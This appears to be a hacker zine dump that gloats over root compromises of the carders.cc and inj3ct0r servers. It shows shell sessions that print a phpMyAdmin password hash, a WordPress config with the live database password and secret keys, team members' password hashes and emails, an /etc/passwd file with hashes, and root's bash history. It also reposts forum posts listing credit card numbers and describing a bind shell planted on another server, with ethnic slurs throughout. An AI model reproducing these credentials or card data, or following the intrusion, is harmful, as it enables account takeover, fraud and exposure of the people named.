-rwxrwxr-x  1 carderscc  www    2656 Apr 28  2008 history.swf
-rwxrwxr-x  1 carderscc  www   14590 Jun 30 16:00 index.html
-rwxrwxr-x  1 carderscc  www    2518 Apr 28  2008 osxmousewheel.js
-rwxrwxr-x  1 carderscc  www     657 Apr 28  2008 playerProductInstall.swf

$ cd pma

$ cat .htpasswd
admin:0VisONWLe5DJE

$ cd /

$ls
total 47
drwxr-xr-x  17 root  wheel   512 Jul  3 19:12 .
drwxr-xr-x  17 root  wheel   512 Jul  3 19:12 ..
-rw-r--r--   1 root  wheel   798 Jan 18  2010 .cshrc
-rw-r--r--   1 root  wheel   265 Jan 18  2010 .profile
-r--r--r--   1 root  wheel  6206 Jan 18  2010 COPYRIGHT
-rw-r--r--   1 root  wheel     0 Jul  3 19:12 a
drwxr-xr-x   2 root  wheel  1024 Jan 18  2010 bin
drwxr-xr-x   7 root  wheel   512 Jan 18  2010 boot
dr-xr-xr-x   5 root  wheel   512 Nov 24 21:14 dev
drwxr-xr-x  22 root  wheel  2560 Nov  1 23:54 etc
drwxr-x--x   4 root  wheel   512 Nov  1 23:54 home
drwxr-xr-x   3 root  wheel  1536 Jan 18  2010 lib
drwxr-xr-x   2 root  wheel   512 Apr  4  2010 libexec
drwxr-xr-x   2 root  wheel   512 Jan 18  2010 media
drwxr-xr-x   2 root  wheel   512 Jan 18  2010 mnt
dr-xr-xr-x   1 root  wheel     0 Dec  6 00:58 proc
drwxr-xr-x  11 root  wheel  1024 Nov  8 20:33 root
drwxr-xr-x   2 root  wheel  2560 Jan 18  2010 sbin
lrwxr-xr-x   1 root  wheel    11 Jan 18  2010 sys -> usr/src/sys
drwxrwxrwt  11 root  wheel   512 Dec  5 23:42 tmp
drwxr-xr-x 15 root  wheel   512 Jan 18  2010 usr
drwxr-xr-x  23 root  wheel   512 Nov 24 21:14 var

?>

$ cd /home/cardersblog

$ ls
total 8
drwxr-xr-x  4 cardersblog  www     512 Nov  2 01:16 .
drwxr-x--x  4 root         wheel   512 Nov  1 23:54 ..
dr-xr-x---  5 cardersblog  www    1024 Nov 21 00:18 blog.carders.cc
drwxrwxrwx  2 cardersblog  www     512 Nov  2 01:16 temp

$ cd blog.carders.cc

$ ls
total 2928
dr-xr-x---  5 cardersblog  www     1024 Nov 21 00:18 .
drwxr-xr-x  4 cardersblog  www      512 Nov  2 01:16 ..
-rw-r--r--  1 cardersblog  www      188 Nov 21 00:18 .htaccess
-r-xr-x---  1 cardersblog  www      397 Aug 27 17:22 index.php
-r-xr-x---  1 cardersblog  www  2683109 Jul 18 16:06 latest.tar.gz
-r-xr-x---  1 cardersblog  www    15410 Aug 27 17:22 license.txt
-r-xr-x---  1 cardersblog  www     9122 Aug 27 17:22 readme.html
-r-xr-x---  1 cardersblog  www     4391 Aug 27 17:22 wp-activate.php
dr-xr-x---  7 cardersblog  www     2560 Jul 18 16:06 wp-admin
-r-xr-x---  1 cardersblog  www    40284 Aug 27 17:23 wp-app.php
-r-xr-x---  1 cardersblog  www      220 Aug 27 17:23 wp-atom.php
-r-xr-x---  1 cardersblog  www      274 Aug 27 17:23 wp-blog-header.php
-r-xr-x---  1 cardersblog  www     3926 Aug 27 17:23 wp-comments-post.php
-r-xr-x---  1 cardersblog  www      238 Aug 27 17:23 wp-commentsrss2.php
-r-xr-x---  1 cardersblog  www     3173 Aug 27 17:23 wp-config-sample.php
-r-xr-x---  1 cardersblog  www     3506 Jul 31 14:20 wp-config.php
dr-xr-x---  6 cardersblog  www      512 Aug 27 18:05 wp-content
-r-xr-x---  1 cardersblog  www     1255 Aug 27 17:23 wp-cron.php
-r-xr-x---  1 cardersblog  www      240 Aug 27 17:23 wp-feed.php
dr-xr-x---  7 cardersblog  www     2560 Jul 18 16:06 wp-includes
-r-xr-x---  1 cardersblog  www     2002 Aug 27 17:23 wp-links-opml.php
-r-xr-x---  1 cardersblog  www     2441 Aug 27 17:23 wp-load.php
-r-xr-x---  1 cardersblog  www    26059 Aug 27 17:23 wp-login.php
-r-xr-x---  1 cardersblog  www     7774 Aug 27 17:23 wp-mail.php
-r-xr-x---  1 cardersblog  www      487 Aug 27 17:23 wp-pass.php
-r-xr-x---  1 cardersblog  www      218 Aug 27 17:23 wp-rdf.php
-r-xr-x---  1 cardersblog  www      316 Aug 27 17:23 wp-register.php
-r-xr-x---  1 cardersblog  www      218 Aug 27 17:23 wp-rss.php
-r-xr-x---  1 cardersblog  www      220 Aug 27 17:23 wp-rss2.php
-r-xr-x---  1 cardersblog  www     9177 Aug 27 17:23 wp-settings.php
-r-xr-x---  1 cardersblog  www    18695 Aug 27 17:23 wp-signup.php
-r-xr-x---  1 cardersblog  www     3702 Aug 27 17:23 wp-trackback.php
-r-xr-x---  1 cardersblog  www    94184 Aug 27 17:23 xmlrpc.php

$ cat wp-config.php
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, WordPress Language, and ABSPATH. You can find more information
 * by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
 * wp-config.php} Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'carderscc_02');

/** MySQL database username */
define('DB_USER', 'carderscc_02');

/** MySQL database password */
define('DB_PASSWORD', 'UGZf7e6gzugef76t&/gudz376/&$%e3zugdwzgdwdztFzettf6532df');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'Mcpgq1/{n^mP,4naDg;4Y/gdX+J~.(DBLI|y~FJy*+@BDtD=CJr^M$idR[*P vuR');
define('SECURE_AUTH_KEY',  '-=q0$7`R?iH}MkK^KHxbxa4)-]OcrG3y2^EVT^fs%6&7-!<v.<__AcgC^_T+$$sM');
define('LOGGED_IN_KEY',    'Sb{c7+Nhb%ao-#ylff|(I{m,fqK5}>/?7m8/r0!,o}+e:eQfZo;7W:h7av[E:0V[');
define('NONCE_KEY',        '|R(!,}:(`utsK5k<SJ%:J#b&UR/LxE.50Y9`6:zP;Kj0VVeGWx4(%Guh=+gb^{W6');
define('AUTH_SALT',        '|zI ^JtuY-|uB;}I~X~Sn.W[BZ_pX gWA*nFL`SR]b+ bB,LVj7u+Rov|F=*@ DP');
define('SECURE_AUTH_SALT', 'N^]btUNZY-k+|%HkM##`iB2b{pftxG~:WDLwp}a!M+d8Gy.*M?p(]-SQPfZq]+k)');
define('LOGGED_IN_SALT',   'JASsyk1%PQ|!exxL,JB|0or-~zWcx+lv+KpnMH<M<&+Ro=USk--Z:8 #8a!+NkL$');
define('NONCE_SALT',       'yN8`y~ji$4+1)&N3j+KcY*x~n7=vS)Ip;! [>Q0$LoSd=e?X+C]bqBEp5WWbWLSb');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * WordPress Localized Language, defaults to English.
 *
 * Change this to localize WordPress.  A corresponding MO file for the chosen
 * language must be installed to wp-content/languages. For example, install
 * de.mo to wp-content/languages and set WPLANG to 'de' to enable German
 * language support.
 */
define ('WPLANG', '');

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
 define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

##


                                                               |  
                                                  __________   |  
                                 _    __    _    |          |  |  
                                /_\  /  \  /_\   |          |  |  
         put  shit              =|= | // | =|=   |          |  |  
          to shit                !   \__/   !    |          |  |  
        carders.cc                     _         |          |  |  
       ___   |           ___          //'        |          |  |  
      [___]  |    _   :=|   |=:   __T_||_T__     |p=        |  |  
      |  ~|  |  =)_)=   |   |    [__________]    |          |  |  
      |   |  |   (_(    |xXx|     \_      _/     |          |  |  
      |   |  |   )_)    """""       \    /       |          |  |  
      \___|  V                       |  |        |          |  |  
       |  `========,                 |  |        |          |  |  
________`.        .'_________________|  |________|__________lc_|  
          `.    .'                  (____)                      \ 
          _|    |_...             .;;;;;;;;.                     \
         (________);;;;          :;;;;;;;;;;:                     
              :::::::'            '::::::::'  HAPPY NINJA BATHROOM

Team Member Passes:

Vitali:28cf8ccb53f80f7e8fca5e781f2e6424:dusFzU/ZvUe;e@fx\\3>XIgN[yGx9[*:[email protected]
Juri:9475264713e83164de106d099350ff97:pqfgN4x7P)5_}0-E+PsIJ\\=_o1|oV&:[email protected]
Luigi:13ae8bfbd4fc44302fc6261f58dd583e:.u5//.-K4<b~M[3Ag#|xSIHhmSuKrT:[email protected]
acheron:60536586e174bce7aa1fccf6a674f6f6:"Ru97*G!'*1'{vhs}3Ze4jCnQ8CT=p:
cyberhood:c5ad50f86c6dbbbea072c243b6466a1f:XY4NYQYr:[email protected]
e0s:86ca341341366d95e5eb02c79d1cfd47:Q\\8NL6Zno+G-}J'n(T?ndQbV{vhcN=:[email protected]
M0RPHEUS:fa667b7f92f7cc9f7739bbbbe68f9a9c:E\\T$#=?"hy"g0BD~@giHAtDDj`P0VS:[email protected]
Mr.Rus:6e3c81779f105c2cb8a5f36261000cc5:x6GX91GTd$D^yn/@U>`u$lm00M3V}h:[email protected]
Poseidon:0c18d81bcfa2845490f75e785f0e2457:BG$vA-%K_X<F8S%-"~fzr8&t(JJV)7:[email protected]
SILEN0S:a02675626c179834bf1a2545658a9426:5{+!Og}.xKA&$PHo)5nH-DKO_[zK9L:[email protected]
slashx:edb36a0c2d7fe71ecabe36152b4ff942:S'I)uhPovr~Y=;/$S=p)k.SFdqw7)P:[email protected]
Tiberius:03b38fcabea847925ab42d66e8134d1b:GS.XKvwJnhsr[7a9l7E6g+?E><=|nF:[email protected]


You guys dont get it, do you? We told you to fuck off  and  still  you
did not listen. We are not sorry for doing it again. You deserve it.  

 ____________________________________________________|_._._._._._._._,
 \___________________________________________________|_|_|_|_|_|_|_|_|
                                                     !  ~ inj3ct0r ~  

#`````````` ___    ____    ____
#````______/```\__//```\__/____\
#``_/```\_/``:```````````//____\
#`/|``````:``:``..``````/````````\   W A R N I N G !!! DISCOVERED LAMER O_o
#|`|`````::`````::``````\````````/
#|`|`````:|`````||`````\`\______/
#|`|`````||`````||``````|\``/``|
#`\|`````||`````||``````|```/`|`\    1) maybe you were wrong address, go Inj3ct0r.com
#``|`````||`````||``````|``/`/_\`\
#``|`___`||`___`||``````|`/``/````\
#```\_-_/``\_-_/`|`____`|/__/``````\
#````````````````_\_--_/````\`````/  2) Or you are not wrong address, then Fuck Off!
#```````````````/____```````````/
#``````````````/`````\`````````/
#``````````````\______\_______/

Attention. This ridiculous banner is *not* part of our zine.  In  fact
it is inj3ct0r's 404 page. We concluded  that  this  banner  perfectly
reflects their retardedness. Their knowledge about security is on  the
same level as their ability to speak proper  english.  For  those  who
don't  know:  inj3ct0r  is  a  clone  of  the  old  milw0rm   project,
administered by some morons called "r0073r", "Sid3^effects" and  "L0rd
CrusAd3r". They are not only  an  exploit-db,  but  also  an  arrogant
community of retarded turks and arabs which tell you how you to  write
your stupid Perl SQL-Injection exploit.                               
                                                                      
All their attention whoring about how they hacked Facebook was driving
us insane and all their moaning about how they have problems with  the
law was just too ridiculous for us  to  let  them  continue  existing.
Actually we did not find out what kind of law problems  they  actually
had. We did however discover how stupid these kids are and  what  crap
they are talking about in their private forum area's. Check it out:   

-------------
-0day 31337 privat Area
-10-24-2010, 05:08 PM Post by KnocKout:
-
-0-Day Credit Cards | Part 2(Only 31337 Prv.)-
-
-Hi My Brothers..
-
-14367 4454-5454-5454-5445 1 232 12-2012
-14375 5257-9555-0001-0933 1 082 03-2013 ADVANTAGE
-14376 5492-9495-5876-7382 1 280 01-2013 BONUS
-14391 5437-7122-6415-1343 1 334 07-2012 MAXÐMUM
-14392 5437-7122-6415-1343 1 334 07-2012 MAXÐMUM 
--------------
-
-0day 31337 privat Area
-10-17-2010, 04:36 PM Post by KnocKout:
-
-Default  => Rapid,Hotfile,CC Requests..  
-
-hi my brothers,
-RapidShare, Hotfile Premium and Credit Card. Requests..
-
-Please indicate your requests here, and I will send Pm.. 
--------------

Not only they are sharing CC's, they also think of themselves  as  the
best hackerz on the planet. Here is how they talk about exploit-db and
offsec:                                                               

-------------
-0day 31337 privat Area:
-07-19-2010, 10:05 PM Post by SeeMe:
-
-guys, a bind shell have been sent to offsec server and enforced the regarding ports to be open
-
-Port State Service Reason Product Version Extra info
-22 tcp open ssh syn-ack OpenSSH 5.4 protocol 2.0
-80 tcp open http syn-ack Apache httpd 2.2.15 (Fedora)
-301 tcp filtered unknown no-response
-443 tcp open https syn-ack
-1072 tcp filtered unknown no-response
-1087 tcp filtered unknown no-response
-1100 tcp filtered unknown no-response
-1111 tcp filtered unknown no-response
-1117 tcp filtered unknown no-response
-1443 tcp filtered ies-lm no-response
-1718 tcp filtered unknown no-response
-1720 tcp filtered H.323/Q.931 no-response
-1900 tcp filtered upnp no-response
-2000 tcp filtered cisco-sccp no-response
-2041 tcp filtered interbase no-response
-2046 tcp filtered sdfunc no-response
-2382 tcp filtered ms-olap3 no-response
-3017 tcp filtered unknown no-response
-4129 tcp filtered unknown no-response
-4900 tcp filtered unknown no-response
-5060 tcp filtered sip admin-prohibited
-5555 tcp filtered freeciv no-response
-5560 tcp filtered isqlplus no-response
-6669 tcp filtered irc no-response
-8007 tcp filtered ajp12 no-response
-9102 tcp filtered jetdirect no-response
-10000 tcp open snet-sensor-mgmt syn-ack
-44443 tcp filtered coldfusion-auth no-response
-
-but I just can't connect back to it
-
-any idea!
-------------
-
-07-21-2010, 10:10 PM Post by SeeMe:
-
-This is a new technology for me how to gain credentials over HTTP TRACE and TRACK
-when it's enable on a webserver
-
-The TRACE/TRACK method was enabled on the server listed below:
-
-http://www.offensive-security.com:80/
-
-[PHP]http://www.offensive-security.com/wp-content/themes/infocus/lib/scripts/prettyPhoto/js/jquery.prettyPhoto.js?ver=./2.9.2%20HTTP/1.1[/PHP]
-
-
-could gain view info from the link above  
-------------
-
-07-30-2010, 12:26 AM Post by SeeMe:
-
-http://mobile.backtrack-linux.org/
-
-exploited for good and not sure that will be able to back it up
-
-and I'm still heading for the main both sites, offsec.com and exploit-db
-
-After one month into the desert I'll be back infront of my computer on 15th of Agu
-
-and I'll prepare for a globel war
-------------


They are calling exploit-db "lamers-db" yet they  don't  see  who  the
real lamers are. Hardly surprising that  the  inj3ct0r  team  did  not
manage their box themselves and instead gave their work  to  some  fat
guy called "asker". But since he left  his  box  rot  with  some  half
updated shit, it was a child's play to tap in and root.               

$ uname -a
Linux wateam 2.6.26-2-686 #1 SMP Thu Sep 16 19:35:51 UTC 2010 i686 GNU/Linux

$ id
uid=0(root) gid=0(root) groups=0(root)

$ cd /

$ ls -la
total 540
drwxr-xr-x  22 root root   1024 Oct  3 22:04 .
drwxr-xr-x  22 root root   1024 Oct  3 22:04 ..
drwxr-xr-x   2 root root   3072 Oct  3 21:09 bin
drwxr-xr-x   4 root root   1024 Oct  3 21:10 boot
drwxr-xr-x  15 root root   3460 Oct 15 15:19 dev
drwxr-xr-x  68 root root   6144 Oct 20 17:44 etc
drwxr-x--x  37 root root   4096 Oct 20 17:45 home
drwxr-xr-x   2 root root   1024 Nov  3  2007 initrd
lrwxrwxrwx   1 root root     28 Jul 29 11:28 initrd.img -> boot/initrd.img-2.6.26-2-686
lrwxrwxrwx   1 root root     28 Nov 24  2008 initrd.img.old -> boot/initrd.img-2.6.18-6-686
drwxr-xr-x  12 root root   7168 Oct  3 21:09 lib
drwx------   2 root root  12288 Nov  3  2007 lost+found
drwxr-xr-x   2 root root   1024 Nov  3  2007 media
drwxr-xr-x   2 root root   1024 Oct 28  2006 mnt
drwxr-xr-x   2 root root   1024 Nov  3  2007 opt
dr-xr-xr-x 154 root root      0 Oct 15 15:18 proc
drwxr-x---   7 root root   1024 Oct 15 17:27 root
drwxr-xr-x   2 root root   6144 Oct  3 21:09 sbin
drwxr-xr-x   2 root root   1024 Sep 16  2008 selinux
drwxr-xr-x   2 root root   1024 Nov  3  2007 srv
drwxr-xr-x  11 root root      0 Oct 15 15:18 sys
drwxrwxrwt   7 root root 492544 Oct 24 19:03 tmp
drwxr-xr-x  12 root root   4096 Jul 29 11:22 usr
drwxr-xr-x  15 root root   4096 Oct 29  2009 var
lrwxrwxrwx   1 root root     25 Jul 29 11:28 vmlinuz -> boot/vmlinuz-2.6.26-2-686
lrwxrwxrwx   1 root root     25 Nov 24  2008 vmlinuz.old -> boot/vmlinuz-2.6.18-6-686

$ cat /etc/passwd
root:1NMGwkEq76.BsjeYGuM106fIjuU.RS/:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/bin/sh
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
news:*:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
mysql:!:100:102:MySQL Server,,,:/var/lib/mysql:/bin/false
proftpd:!:101:65534::/var/run/proftpd:/bin/false
ftp:!:102:65534::/home/ftp:/bin/false
sshd:!:103:65534::/var/run/sshd:/usr/sbin/nologin
Debian-exim:!:104:104::/var/spool/exim4:/bin/false
krivopustov:1V5RSW94dbZ3zwhsovKB4V5hHgvLLF/:1002:1002:,,,:/home/krivopustov:/bin/bash
volosovets:1NMLjMXqhFedJgnjw0uBwdQ2jRFqbG0:1007:1007:,,,:/home/volosovets:/bin/bash
wapper:1c1iEEB/k591mvgQk8a5mbsZmPwY8Q1:1008:1008:,,,:/home/wapper:/bin/bash
jaguar:1NOCfawFB/TD6X9.hEmN9Mn0kg1G.s1:1011:1011:,,,:/home/jaguar:/bin/bash
postfix:!:105:106::/var/spool/postfix:/bin/false
popa3d:!:106:109::/var/lib/popa3d:/bin/false
asmer:1O2E8f0enwpuZw37FkNoe0MNSktFTd.:1012:1012:,,,:/home/asmer:/bin/bash
wateam:1cewmdLFokkbiLeLlHrL2NJnPdqpnR/:1013:1013:,,,:/home/wateam:/bin/bash
silentwarrior:1aDOI9IqA5BrDw1EBfH4Afm5TYRNe//:1014:1014:,,,:/home/silentwarrior:/bin/bash
snt-nmu:1NZO0tdC.reQ07bby/FttmOEZLF7ys1:1015:1015:,,,:/home/snt-nmu:/bin/bash
nmusic:1tXoV.I8o28zdaeu.Ukrde4hYikNtG0:1020:1020:,,,:/home/nmusic:/bin/bash
mydns:1C8cYgZB0p9rtxWwyXoiJiK4QUa.sJ/:1021:1021:,,,:/home/mydns:/bin/bash
conference-sidelnikov:1ghcMsPcI9j5ok3AbEf5qGI.h7Mq7O.:1016:1016:,,,:/home/conference-sidelnikov:/bin/bash
lena:153QNshcJB/5PK1r8L/60LAOJCwzik1:1000:1000:,,,:/home/lena:/bin/bash
vakulenko:1g6y9T9/TWWr1s.FTZKwuKj2qwbYxg1:1027:1027:,,,:/home/vakulenko:/bin/bash
xanavi:1V4L5wKgWog9Kl4lV0uwvG0/0TyHyq1:1001:1001:,,,:/home/xanavi:/bin/bash
lalizas:1dzDm0j2v0fE06VyK89b/Pfm6ePylC0:1003:1003:,,,:/home/lalizas:/bin/bash
r0otech0inj3ct0rr00t0ro0t3r:1Yu.4UMOxpFH639CL8260qyjYwKgbk1:1006:1034:,,,:/home/r0otech0inj3ct0rr00t0ro0t3r:/bin/bash
n3tw0rkTeRr0r15M:1u1DDFCJnGFd0M07E5kahW3t0N1yYD1:1010:1034:,,,:/home/n3tw0rkTeRr0r15M:/bin/bash
pma:1cDULb4Zqt4ksmqqFe9MIQSBLrz3lO.:1019:1019:,,,:/home/pma:/bin/bash
valiant:1QXeOzsOyaW8gT6JknX1Ssa.A3ef8g/:1024:1024:,,,:/home/valiant:/bin/bash
cherrybikes:11MJaagK8rJ6BQ9pxLdZjU.WhIGG4r0:1031:1031:,,,:/home/cherrybikes:/bin/bash
natasha:1NmwIlomO.Y00wBbg0eGE9dqOP4qis/:1032:1032:,,,:/home/natasha:/bin/bash
ntp:!:107:107::/home/ntp:/bin/false
chupik:1gpJL5HGbm7EeCor46OOs8L0y1L7mH1:1005:1033:,,,:/home/chupik:/bin/bash
sweethome:1x4j1/bzV8Vf5fHBfeSp3BgMUNojJf.:1004:1035:,,,:/home/sweethome:/bin/bash
sweethome-lena:1uZFdDmVbAHGDtbBEGs1jjYYtvVONN1:1009:1036:,,,:/home/sweethome-lena:/bin/bash
skyweb:1.wiXZLSKG4F6WGVdgKDIorjx77.ZD1:1028:1037:,,,:/home/skyweb:/bin/bash
yslivka:1RNlOuljj5wZ8hdD0kSDe2wPMREdBu1:1029:1038:,,,:/home/yslivka:/bin/bash
tmv-nmu:168k122DrZFKqjXrwYSjjdMSKzzVDy.:1030:1039:,,,:/home/tmv-nmu:/bin/bash
web-ghost:1wuuXL1mSrDxVErzeO0KuoZKu8mJBj1:1018:1018:,,,:/home/web-ghost:/bin/bash
tiler-andrey:1RGxMA/cQA090Sx/VTTctkkHFZEs7I1:1035:1041:,,,:/home/tiler-andrey:/bin/bash
sunsanych:1RaR9SD58m80b/DVZEHYg6Ik4SKYWJ.:1036:1042:,,,:/home/sunsanych:/bin/bash
ra5ta:1nkELVbaHtGqTJl29kSFbjlDs1Yy3U0:1037:1043:,,,:/home/ra5ta:/bin/bash
magicgarden:1.MBu1KaRXkR2bihB8ZXnqfHbqQ5bm0:1038:1044:,,,:/home/magicgarden:/bin/bash
hochumogu:1MwCkIsEmO0Xe/BV8PndFgE9sIMF/Q1:1025:1025:,,,:/home/hochumogu:/bin/bash
libuuid:!:108:110::/var/lib/libuuid:/bin/sh
steelnews:1ajGgNpodz1jrN1JlmcmLmms5Wf7kn0:1017:1017:,,,:/home/steelnews:/bin/bash
vonline:1sk1MRD8BW3jlEKEYUNCtJ3d0gY1bh0:1022:1045:,,,:/home/vonline:/bin/bash
dyquem:1JkATmEyg3XnBHIeGOEstzP2vmes4s1:1039:1046:,,,:/home/dyquem:/bin/bash
vika:1bkhqsMEjgj7H.DzRJLoGj64SksjzM1:1040:1047:,,,:/home/vika:/bin/bash
tiler-dima:1jKtO0mArwxlajKK9/v4yFHF1mu9/g0:1026:1040:,,,:/home/tiler-dima:/bin/bash
mazafaka:1LSjx2PhiI7OlLVcMSEz2GJDUiwBmg.:1034:1034:,,,:/home/mazafaka:/bin/bash
tiler:1Qa4oVdJmYjcu6Ccq/7AqTEA6V2GIT1:1023:1023:,,,:/home/tiler:/bin/bash

$ cd /root

$ ls -la
total 14
drwxr-x---  7 root root 1024 Oct 15 17:27 .
drwxr-xr-x 22 root root 1024 Oct  3 22:04 ..
drwx------  2 root root 1024 Aug 20 02:09 .aptitude
-rw-------  1 root root 6748 Oct 22 22:28 .bash_history
drwxr-xr-x  2 root root 1024 Aug 20 02:09 .debtags
drwxr-xr-x  2 root root 1024 Oct 15 17:29 .mc
drwxr-xr-x  2 root root 1024 Aug  2 21:39 scripts
drwxr-xr-x  2 root root 1024 Oct 15 16:51 test

$ cat .bash_history
apache2 -k restart
cd /home/maza*/h*
ls -al
nano index.html
ls -al
nano index.html
exit
a2ensite mazafaka.in
apache2 -k restart
edquota -g inj3ct0r
quotatool
quotatool -g inj3ct0r -bl 512M /home
edquota inj3ct0r
edquota -g inj3ct0r
exit
cd /home/n*
ls -al
cd ht*
ls -al
nano index.php
ls -al
cd t*dark
ls -al
cd gra*
ls -al
cd ..
du
cd ..
ls -al
du tech_dark
du tech_blue
du tech_white
ls -al
cd cpstyles
ls -al
du
du -h
cd .
cd..
 cd ..
du -h *dark
cd tech_dark
ls -al
cd misc
ls -al
cd ..
cd ..
find ./ -name *.tpl
find ./ -name *.htm
find ./ -name *.htm*
find ./ -name *.tpl
cd ..
cd ht*
cd gree*
ls -al
du -h
cd pools
cd pools
cd polls
ls -al
cd ..
cd regimage
ls -la
cd ../..
nano index.php
ls -al
rm ya*.txt
rm google*
cd incl*
ls -al
cd ..
ls -al
cd green*
ls -al
cd editor
ls -al
cd ..
cd attach
ls -al
cd ..
cd ..
ls -al
find ./ -name *.css
cd cp*
ls -al
cd vB*
ls -al
cd ..
ls -al
du -h
cd ..
find ./ -name *.css
nano ./tech_white/tech_white.css
exit
cd /etc/
nano crontab
exit
cd /var/
ls -la
cd mail
ls -al
cd /etc/postfix
nano virtual
postmap virtual
nano aliases
defrag
ls -al
exit
cd /var/mail
ls -al
rm tiler-*
ls -la
exit
exit
passwd tiler
passwd tiler
exit
cd /etc/
nano passwd
exit
passwd lena
exit
sasldbpasswd2
saslpasswd2
saslpasswd2 -c lena
sasllistusers2
sasldblistusers2
saslpasswd2
saslpasswd2 -d sweethome-lena
exit
saslpasswd2 -c sweethome-lena
passwd sweethome-lena
exit
passwd tiler
exit
cd /home/snt*
ls -al
cd ht*
ls -al
nano index.php
exit
cd /home/sn*/h*/
nano index.php
cd /home/wa*/h*
ls -al
nano index.php
cd /home/wateam
cd h*
nano index.html
exit
cd /home
ls -al
cd lena
ls -al
cd htdocs
ls -al
cd ..
cd ..
rm lena -R
cd mydns
ls -al
cd ..
rmdir mydns
cd temp
ls -al
du -h
rm *
cd ..
ls -al
cd lo*
ls -al
cd ..
rmdir lost+found
exit
cd /home/wateam
ls -al
cd other
ls -al
cd ../htdocs
nano index.html
exit
cd /home/n*
cd htdocs
ls -al
cd inc*
ls -al
nano config.php
exit
cd /etc/apache2
nano apache2.conf
nano vhosts.conf

nano apache2.conf
apache2 -k restart
nano apache2.conf
apache2 -k restart
cd /mo*e
cd mo*e
nano fcgi*
cd ..
nano vhosts
nano vhosts
cd /var/lib/log*
ls -al
cat status
cat status|more
nano status
rm status
logrotate
logrotate -f /etc/logrotate.conf
ls -al
nano status
ls -al
df -h
cd /var/log
ls -al
exit
cd /home/
tar --help
tar 
cls
tar --help|more
tar --help|more
tar --help|more
cd cd tiler
ls -al
cd tiler
ls -al
tar cvzf tiler.tar
ls -al
cd ht*
ls -al
tar cvzf tiler.tar
tar --help|more
man tar
ls -akl
ls -al
cd ..
tar -zcvf tiler.tar htdocs
ls -la
nano /etc/passwd
init 6
exit
ren
rename
mkdir test
cd test
touch 1d_5.jpg
touch 1d_7.JPG
touch 1.jpg
touch 1d7.JPg
ls -al
rename
rename --help
man rename
rename -n (.*)\.JPG 1.jpg
rename -n '/.*\.JPG/' *.jpg
rename -n /.*\.JPG/ *.jpg
rename -n /.*\.JPG/ *
rename -nv /.*\.JPG/ *
ls -al
rename -nv s/.*\.JPG/ *
rename -nv /.*\.JPG/ *
rename -nv /.*\.JPG/ *.JPG
rename -nv /.*\.JPG/ *.JPG
rename -nv '/.*\.JPG/' *.JPG
rename -nv '/.+\.JPG/' *.JPG
rename -nv '/.+\.JPG/' *.JPG
rename -nv . *
rename -nv /./ *
rename -nv /./ *.JPG
rename -n 'y/A-Z/a-z/' *
rename -n '/A-Z/a-z/' *
rename -n /\.JPG/ *
rename -n /\.JPG/ *.JPG
rename -n '\.JPG' *.JPG
rename -n 's/\.JPG/' *.JPG
rename -n 's/\.JPG//' *.JPG
rename -n 's/\.JPG//' *.JPG
rename -n '/\.JPG//' *.JPG
rename -n '/\.JPG//' *.JPG
rename -n '/\.JPG/' *.JPG
rename -n 's/\.JPG//' *.JPG
ls -al
mv 1.jpg ONE.JPG
ls -la
rename -n 's/\.JPG//' *.JPG
rename -n 's/\.JPG//' **
rename -n 's/\.JPG//' *.*
rename -n 's/\.JPG//'
rename -n 's/\.JPG//' *.JPG
rename -n 's/\.JPG//' *E.JPG
rename -n 's/\.JPG//' *.
man rename
rename -nv s\.jpg// *.JPG
rename -nv s\./jpg// *.JPG
rename -nv s\./jpg// *.JPG
man rename
rename -nv .JPG .jpg *
rename -nv /.JPG .jpg/ *
rename -nv /\.JPG \.jpg/ *
rename -nv /\.JPG \.jpg/ *rename .bak .txt *.bak
rename .bak .txt *.bak
rename -nv s/\.JPG/\.jpg/ *
rename -nv s/\.JPG/\.jpg/ *
rename -nv s/\.JPG/\.jpg/ *
rename -nv s/\.JPG/\./ *
rename -nv s/\.JPG/\.jpg/ *
cd /home/
cd tiler
cd ht*
cd up*
cd ima*
ls -al
rename s/\.JPG/\.jpg/ *
ls -al
ls -al
rename s/\.JPG/\.jpg/ *
rename -nv s/\.JPG/\.jpg/ *
rename -nv s/\.JPG/\.jpg/ *|more
